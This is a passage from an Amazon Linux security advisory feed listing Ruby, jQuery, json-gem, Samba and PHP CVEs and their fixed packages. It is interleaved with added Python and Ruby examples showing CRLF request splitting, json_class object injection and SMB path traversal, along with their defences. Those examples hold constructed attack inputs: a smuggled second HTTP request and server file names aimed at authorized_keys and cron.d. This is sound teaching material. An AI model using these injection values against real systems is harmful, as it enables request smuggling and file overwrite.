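As an added example covering both the httplib2 client-side issue in ALAS-2020-1420 (CVE-2020-11078) and the WEBrick response-splitting issue just described (CVE-2019-16254), and not code from either project: the functions below show how a string-concatenated URI carries a caller's CR/LF straight into the raw request line, how percent-encoding each path segment with urllib.parse.quote closes that, and a header-value check that rejects a lone CR or a lone LF as well as the CRLF pair, which is the gap the advisory text attributes to the earlier fix. The request bytes are assembled by hand for illustration and nothing is sent over the network.

```python
from urllib.parse import quote

CR, LF = "\r", "\n"


def raw_request_line(path):
    """Client-side bug shape: the caller's string is dropped into the request
    line unescaped, so CR/LF inside it end the line and start new headers or
    even a second, hidden request on the same connection."""
    return "GET " + path + " HTTP/1.1" + CR + LF


def safe_request_line(segments):
    """Fix: percent-encode every path segment before joining. With safe=''
    quote() also encodes '/', so one segment cannot smuggle extra path
    components; CR and LF become %0D and %0A."""
    path = "/" + "/".join(quote(seg, safe="") for seg in segments)
    return "GET " + path + " HTTP/1.1" + CR + LF


def count_request_lines(raw):
    """Number of non-empty HTTP lines a server would see in what was sent."""
    return len([line for line in raw.splitlines() if line])


def incomplete_header_check(value):
    """Pre-fix behaviour kept for comparison: only the CRLF pair is rejected,
    so an isolated CR or LF still splits the header."""
    return (CR + LF) not in value


def header_value_is_safe(value):
    """Server-side check: reject any CR or LF in a response header value,
    whether or not they appear together."""
    return CR not in value and LF not in value


def demo():
    # Constructed attacker input for the request path.
    injected = "/x" + CR + LF + "Host: evil" + CR + LF + CR + LF + "GET /hidden HTTP/1.1"
    return {
        "raw_lines": count_request_lines(raw_request_line(injected)),
        "safe_line": safe_request_line(["x" + CR + LF + "Host: evil"]),
        "crlf_caught_by_old": not incomplete_header_check("a" + CR + LF + "b"),
        "lone_lf_missed_by_old": incomplete_header_check("a" + LF + "b"),
        "lone_lf_caught_by_new": not header_value_is_safe("a" + LF + "b"),
        "lone_cr_caught_by_new": not header_value_is_safe("a" + CR + "b"),
    }


if __name__ == "__main__":
    print(demo())
```

The unescaped request shows up as three distinct lines on the wire, the last of them a second request the caller never intended; the escaped form is a single line. On the server side, the two checks differ only on isolated CR or LF, which is exactly the input the incomplete fix let through.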
CVE-2019-16201:
WEBrick::HTTPAuth::DigestAuth in Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 has a regular expression Denial of Service caused by looping/backtracking. A victim must expose a WEBrick server that uses DigestAuth to the Internet or an untrusted network.
1773728: CVE-2019-16201 ruby: regular expression denial of service vulnerability of WEBrick's Digest access authentication
CVE-2019-15845:
Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 mishandles path checking within File.fnmatch functions.
1789407: CVE-2019-15845 ruby: NUL injection vulnerability of File.fnmatch and File.fnmatch?
CVE-2015-9251:
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
1399546: CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests
CVE-2012-6708:
jQuery before 1.9.0 is vulnerable to Cross-site Scripting (XSS) attacks. The jQuery(strInput) function does not differentiate selectors from HTML in a reliable fashion. In vulnerable versions, jQuery determined whether the input was HTML by looking for the '&lt;' character anywhere in the string, giving attackers more flexibility when attempting to construct a malicious payload. In fixed versions, jQuery only deems the input to be HTML if it explicitly starts with the '&lt;' character, limiting exploitability only to attackers who can control the beginning of a string, which is far less common.
1591840: CVE-2012-6708 js-jquery: XSS via improper selector detection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6708" title="" id="CVE-2012-6708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9251" title="" id="CVE-2015-9251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15845" title="" id="CVE-2019-15845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16201" title="" id="CVE-2019-16201" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16254" title="" id="CVE-2019-16254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16255" title="" id="CVE-2019-16255" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems24" version="2.6.14.4" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.12.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.12.amzn1.noarch.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.4" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.12.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.12.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.12.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.12.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.10" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.12.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.12.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.12.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.12.amzn1.x86_64.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.12.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.12.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.12.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.12.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.12.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.10-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.12.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.12.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1423</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1423: medium priority package update for rubygem-json</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
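The "unsafe object creation" above is the json gem's additions protocol: when additions are enabled, a JSON object carrying a "json_class" key is handed to that class's json_create method instead of being returned as a Hash, so the document decides which class gets instantiated. The following Ruby is an added example, not code from the advisory or from the json gem; the AuditEntry class and the UNTRUSTED document are constructed for illustration. It shows the same bytes producing an object under one parse call and plain data under the other, which is the distinction the upstream fix in json 2.3.0 enforced for the JSON(src) and JSON.parse(src, nil) call styles that CVE-2020-10663 covers.

```ruby
require 'json'

# Constructed stand-in for any application or library class that speaks the
# json gem's "additions" protocol: a json_create class method that builds an
# instance from a parsed Hash. Real targets are classes whose constructors
# have side effects (open files, run commands, deserialize further).
class AuditEntry
  attr_reader :user, :action

  def initialize(user, action)
    @user = user
    @action = action
  end

  # Invoked by the parser when additions are enabled and a JSON object
  # carries {"json_class": "AuditEntry", ...}. Nothing here authenticates
  # the caller; the document alone decides which class gets instantiated.
  def self.json_create(obj)
    new(obj['user'], obj['action'])
  end
end

# Constructed attacker-controlled document: plain JSON that names a class.
UNTRUSTED = '{"json_class":"AuditEntry","user":"mallory","action":"escalate"}'

# Unsafe: additions enabled, so the parser instantiates whatever json_class
# names. On json 2.2.0 and earlier, JSON(src) and JSON.parse(src, nil) took
# this path as well, which is what CVE-2020-10663 describes.
def parse_with_additions(src)
  JSON.parse(src, create_additions: true)
end

# Safe: additions explicitly off. The document comes back as data (Hash,
# Array, String, numbers); "json_class" is just another key.
def parse_safely(src)
  JSON.parse(src, create_additions: false)
end

# Usage: the same bytes yield an object in one case and a Hash in the other.
if __FILE__ == $PROGRAM_NAME
  obj = parse_with_additions(UNTRUSTED)
  puts "with additions: #{obj.class} user=#{obj.user}"
  puts "without additions: #{parse_safely(UNTRUSTED).class}"
end
```

The practical rule this illustrates: parse untrusted input with JSON.parse and an explicit create_additions: false, and reserve JSON.load and the additions protocol for data the application itself produced.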
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem23-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem18-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem20-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem18-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem20-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem21-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem21-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem-json-debuginfo" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem-json-debuginfo-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem22-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem22-json-doc-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem22-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-json-1.8.3-1.53.amzn1.x86_64.rpm</filename></package><package name="rubygem21-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem20-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem22-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem-json-debuginfo" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem-json-debuginfo-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem20-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem23-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem21-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem18-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem22-json-doc" version="1.8.3" release="1.53.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem22-json-doc-1.8.3-1.53.amzn1.i686.rpm</filename></package><package name="rubygem18-json" version="1.8.3" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-json-1.8.3-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1424</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1424: medium priority package update for samba</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10218:
A flaw was found in the Samba client (all Samba versions before 4.11.2, 4.10.10 and 4.9.15): a malicious server can return pathnames to the client that contain path separators. This could allow the client to access files and folders outside the SMB network pathnames it requested. An attacker controlling the server could use this vulnerability to create files outside the client's current working directory, with the privileges of the client user.
1763137: CVE-2019-10218 samba: smb client vulnerable to filenames containing path separators
CVE-2019-10197:
A flaw was found in samba versions 4.9.x up to 4.9.13, samba 4.10.x up to 4.10.8 and samba 4.11.x up to 4.11.0rc3, when certain parameters were set in the samba configuration file. An unauthenticated attacker could use this flaw to escape the shared directory and access the contents of directories outside the share.
1746225: CVE-2019-10197 samba: Combination of parameters and permissions can allow user to escape from the share path definition
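For CVE-2019-10218 the client-side defence is to treat every name the server returns as a single path component and to verify where a download would land before writing it. The Ruby below is an added example, not Samba's code: a check of the kind the smbclient fix implies, run over a constructed directory listing (SERVER_LISTING), with the function names and the /tmp/smbdl destination being this example's own assumptions. It does not cover CVE-2019-10197, which is a server-side configuration issue.

```ruby
# Constructed directory listing of the kind a malicious SMB server could
# return for "ls" or "mget *": the third and fourth names smuggle path
# separators into what a client should treat as a single file name, which
# is the pattern behind CVE-2019-10218.
SERVER_LISTING = [
  'report.txt',
  'quarterly-2020.csv',
  'evil\\..\\..\\home\\user\\.ssh\\authorized_keys',
  '../../../etc/cron.d/backdoor',
  '.',
  '..'
].freeze

# A server-supplied name is acceptable only as a single path component:
# no '/' or '\' (SMB uses backslashes, a POSIX client uses slashes, and a
# hostile server may send either), and not the '.' and '..' pseudo-entries.
def safe_component?(name)
  return false if name.empty?
  return false if name == '.' || name == '..'
  return false if name.include?('/') || name.include?('\\')
  true
end

# Resolve where a downloaded file would land and refuse anything outside
# the destination directory. Returns the absolute local path.
def local_target(dest_dir, name)
  unless safe_component?(name)
    raise ArgumentError, "rejected server-supplied name #{name.inspect}"
  end
  dest = File.expand_path(dest_dir)
  target = File.expand_path(name, dest)
  # Second line of defence: even a name that passed the component check
  # must resolve to a path strictly below dest.
  unless target.start_with?(dest + File::SEPARATOR)
    raise ArgumentError, "path escapes destination: #{target}"
  end
  target
end

# Simulate a recursive download: accepted local paths and rejected names.
def plan_download(dest_dir, listing)
  accepted = []
  rejected = []
  listing.each do |name|
    begin
      accepted.push(local_target(dest_dir, name))
    rescue ArgumentError
      rejected.push(name)
    end
  end
  [accepted, rejected]
end

if __FILE__ == $PROGRAM_NAME
  ok, bad = plan_download('/tmp/smbdl', SERVER_LISTING)
  ok.each { |p| puts "fetch   #{p}" }
  bad.each { |n| puts "reject  #{n.inspect}" }
end
```

The component check rejects both separator styles because the client, not the server, decides which character is a separator on the local filesystem; the expand_path comparison catches anything the first check did not anticipate.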
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10197" title="" id="CVE-2019-10197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10218" title="" id="CVE-2019-10218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.4" release="11.51.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.4-11.51.amzn1.noarch.rpm</filename></package><package name="samba-common-tools" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.4" release="11.51.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.4" release="11.51.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.4-11.51.amzn1.noarch.rpm</filename></package><package name="samba-client" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.4" release="11.51.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-python-test-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.4" release="11.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.4-11.51.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.4" release="11.51.amzn1" epoch="0" 
arch="i686"><filename>Packages/libwbclient-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.4-11.51.amzn1.i686.rpm</filename></package><package 
name="samba-common-libs" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.4-11.51.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.4" release="11.51.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.4-11.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1425</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1425: low priority package update for php72 php73</title><issued date="2020-08-26 23:09:00" /><updated date="2020-08-31 20:58:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7068:
A use-after-free was found in the phar extension: while parsing a PHAR archive in ZIP format, phar_parse_zipfile could continue to use a hash-table key that had already been freed. A crafted archive processed by the phar extension could therefore cause the interpreter to crash or read freed memory, with possible information disclosure. The php72 7.2.33 and php73 7.3.21 packages listed below contain the fix.
1868109: CVE-2020-7068 php: Use of freed hash key in the phar_parse_zipfile function
